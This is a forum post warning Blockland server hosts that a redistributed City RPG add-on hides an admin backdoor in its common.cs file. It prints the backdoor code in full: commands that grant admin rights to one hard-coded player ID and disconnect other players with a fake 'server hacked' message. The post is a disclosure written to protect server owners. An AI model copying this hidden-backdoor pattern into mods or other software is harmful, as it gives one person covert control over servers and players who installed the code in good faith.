Yes, countless times City RPG has been posted, and just recently, JJstorm has released his own City RPG. Yay!
He claims its different, but what is? Maybe the only thing that has been changed to change game experience is in the common.cs file. Wait, where the
other City RPGs posted that where claimed to be posted different when only the common.cs file was changed? Why common.cs?
When the original City RPG was released by Iban, it may or may have not contained the Administration exploit, I although do not know entirely if Iban implanted a Administration exploit or if someone else took it and wrote the exploit.
This is getting
very old. Every City RPG you see posted likely contains the Administration exploit specifically written so only the poster's BL ID can activate it, or else the script will just write some random crap.
So, about the exploit; JJstorms topic (
http://forum.blockland.us/index.php?topic=140531.0 ) posted the link to the City RPG add-on.
I happen to know what to look for when finding the exploit, and when doing so, I succeeded:
The code is written under the "Section 7 : Misc. stuff Functions" in common.cs. This is where the unwanted/useless code is kept, thanks to the person who wrote the admin exploit for being so well organized and easy to find.
This is the code. Including the payload after the exploit has allowed the user to obtain admin:
function serverCmdclaimAdmin(%client)
{
if(%client.bl_id == 1811)
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isSuperAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);
if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
}
}
else
{
warn(%client.name @ "just tried to be an admin! (BL_ID: " @ %client.bl_id @ ")");
}
}
function serverCmdfakeAdmin(%subClient, %name)
{
if(%client.bl_id == 1811 && findClientByName(%name))
{
%client = findClientByName(%name);
%client.fakeAdmin = true;
commandtoclient(%client, 'setAdminLevel', 1);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, 1, 1);
messageAll('MsgAdminForce','\c2%1 has become Super Admin. (Manual)', %client.name);
}
}
function serverCmdkickall(%client)
{
if(%client.bl_id == 1811) {
for(%a = 0; %a < ClientGroup.getCount(); %a++)
{
%subClient = ClientGroup.getObject(%a);
if(%subClient.fakeAdmin) %subClient.delete("Server has just been hacked.");
}
}
}As you can see, the person with the BL ID 1811, which would be JJstorm to use the exploit and payload.
1. The command /claimadmin will allow the the user with BL ID 1811 to activate the event, thus resulting in BL ID 1811, JJstorm to become admin. If the user, however, is not BL ID 1811, a chat message appears with "[Username here] just tried to be admin!".
2. The command /fakeadmin is not fake, but does the same as the /claimadmin command, although applys the variable "fakeadmin", allowing the "kickall" payload to display a extra chat message. Opon using this command displays the chat message: "JJstorm has become Super Admin. (Manual)" or whatever JJstorm has set his username to, appearing a Admin has given him Super Admin or appearing the server got "hacked".
3. The command /kickall says it itself, except the players don't leave. This allows JJstorm to release the payload to delete all of the players objects. When a player's object is deleted, it makes a "glitchy screen" effect. Last and least, the payload writes a chat message displaying "Server has just been hacked.", and the message is false: the server has not been hacked, rather exploiting the server.
I posted this to explain why City RPG was failed and why it will remain failed, also to inform the dangers that may result in your server (ex. Clear all bricks)
Discuss.
